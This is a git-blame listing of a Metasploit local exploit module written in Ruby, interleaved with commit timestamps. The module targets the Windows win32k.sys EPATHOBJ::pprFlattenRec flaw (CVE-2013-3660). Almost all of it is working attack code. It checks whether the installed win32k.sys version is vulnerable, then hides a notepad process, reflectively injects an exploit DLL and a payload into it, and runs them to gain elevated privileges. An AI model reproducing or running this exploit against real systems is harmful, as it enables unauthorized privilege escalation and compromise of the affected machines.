2013-06-28 23:18:21 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-06-28 23:18:21 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2013-12-05 22:25:24 +00:00
|
|
|
require 'msf/core/post/windows/reflective_dll_injection'
|
2013-06-28 23:18:21 +00:00
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = AverageRanking
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
include Msf::Post::Windows::Process
|
|
|
|
include Msf::Post::Windows::FileInfo
|
2013-12-05 22:25:24 +00:00
|
|
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info, {
|
|
|
|
'Name' => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
|
|
|
|
of uninitialized data which allows to corrupt memory. At the moment, the module has
|
|
|
|
been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
|
|
|
|
'progmboy <programmeboy[at]gmail.com>', # Original Exploit
|
2013-11-27 10:00:50 +00:00
|
|
|
'Keebie4e', # Metasploit integration
|
|
|
|
'egypt', # Metasploit integration
|
|
|
|
'sinn3r', # Metasploit integration
|
|
|
|
'Meatballs', # Metasploit integration
|
|
|
|
'juan vazquez', # Metasploit integration
|
|
|
|
'OJ Reeves' # Metasploit integration
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 4096,
|
|
|
|
'DisableNops' => true
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2013-3660' ],
|
|
|
|
[ 'EDB', '25912' ],
|
|
|
|
[ 'OSVDB', '93539' ],
|
2013-11-27 10:00:50 +00:00
|
|
|
[ 'MSB', 'MS13-015' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 15 2013',
|
2013-11-27 22:42:16 +00:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
# TODO: Uncomment this line and remove the Rex.sleep when WsfDelay works properly.
|
|
|
|
# Wait for up to 30 seconds by default for our shell because this exploit can
|
|
|
|
# take quite a while to finish execute
|
|
|
|
#'DefaultOptions' => { 'WfsDelay' => 30 }
|
2013-08-30 21:28:54 +00:00
|
|
|
}))
|
|
|
|
|
2013-11-27 22:42:16 +00:00
|
|
|
# TODO: remove this when we've sorted out the WsfDelay issue.
|
2013-11-27 10:00:50 +00:00
|
|
|
register_options([
|
|
|
|
OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 10 ])
|
|
|
|
], self.class)
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
os = sysinfo["OS"]
|
|
|
|
if os =~ /windows/i
|
|
|
|
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
|
|
|
major, minor, build, revision, branch = file_version(file_path)
|
|
|
|
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
|
|
|
|
|
|
|
|
#WinXP x86 - 5.1.2600.6404
|
|
|
|
#WinXP/2003 5.2.3790.5174
|
|
|
|
#WinVista/2k8 - 6.0.6002.18861 / 6.0.6002.23132
|
|
|
|
#Win72k8R2 - 6.1.7601.18176 / 6.1.7601.22348
|
|
|
|
#Win8/2012 - 6.2.9200.16627 / 6.2.9200.20732
|
|
|
|
case build
|
|
|
|
when 2600
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 6404
|
|
|
|
when 3790
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 5174
|
|
|
|
when 6000
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
when 6001
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
when 6002
|
|
|
|
if branch == 18
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 18861
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 23132
|
|
|
|
end
|
|
|
|
when 7600
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
when 7601
|
|
|
|
if branch == 18
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 18176
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 22348
|
|
|
|
end
|
|
|
|
when 9200
|
|
|
|
if branch == 16
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 16627
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Vulnerable if revision < 20732
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-11-27 10:00:50 +00:00
|
|
|
if is_system?
|
|
|
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
|
|
|
end
|
|
|
|
|
|
|
|
if check == Exploit::CheckCode::Safe
|
|
|
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
if sysinfo["Architecture"] =~ /wow64/i
|
|
|
|
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
|
|
|
|
elsif sysinfo["Architecture"] =~ /x64/
|
|
|
|
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
|
|
|
|
end
|
|
|
|
|
2013-11-27 10:00:50 +00:00
|
|
|
print_status("Launching notepad to host the exploit...")
|
2013-12-04 06:09:41 +00:00
|
|
|
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
|
|
|
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
|
|
|
print_good("Process #{process.pid} launched.")
|
2013-11-27 10:00:50 +00:00
|
|
|
|
2013-12-04 06:09:41 +00:00
|
|
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
2013-11-27 10:00:50 +00:00
|
|
|
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
|
|
|
"cve-2013-3660", "ppr_flatten_rec.x86.dll")
|
|
|
|
library_path = ::File.expand_path(library_path)
|
|
|
|
|
2013-12-04 06:09:41 +00:00
|
|
|
print_status("Injecting exploit into #{process.pid} ...")
|
|
|
|
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
2013-11-27 22:42:16 +00:00
|
|
|
|
2013-12-04 06:09:41 +00:00
|
|
|
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
|
|
|
payload_mem = inject_into_process(host_process, payload.encoded)
|
2013-11-27 10:00:50 +00:00
|
|
|
|
|
|
|
# invoke the exploit, passing in the address of the payload that
|
|
|
|
# we want invoked on successful exploitation.
|
2013-12-04 06:09:41 +00:00
|
|
|
print_status("Payload injected. Executing exploit...")
|
2013-11-27 10:00:50 +00:00
|
|
|
host_process.thread.create(exploit_mem + offset, payload_mem)
|
|
|
|
|
2013-11-27 22:42:16 +00:00
|
|
|
# TODO: remove this Rex.sleep call when the WsfDelay stuff works correctly for local
|
|
|
|
# exploits. For some reason it doesn't appear to work properly.
|
2013-11-27 10:00:50 +00:00
|
|
|
wait = datastore['WAIT'].to_i
|
|
|
|
print_status("Exploit thread executing (can take a while to run), waiting #{wait} sec ...")
|
|
|
|
Rex.sleep(wait)
|
2013-11-27 22:42:16 +00:00
|
|
|
|
2013-11-27 10:00:50 +00:00
|
|
|
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2013-06-28 23:18:21 +00:00
|
|
|
end
|